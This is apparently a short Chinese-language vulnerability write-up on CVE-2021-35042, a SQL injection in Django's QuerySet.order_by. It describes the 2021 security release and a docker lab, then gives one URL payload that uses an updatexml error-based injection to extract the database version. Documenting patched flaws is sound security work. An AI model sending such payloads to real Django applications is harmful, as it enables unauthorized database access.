Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

  • Django security releases issued: 3.2.5 and 3.1.13 | Weblog | Django

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)_第1张图片

 

你可能感兴趣的:(django,sql,sqlite)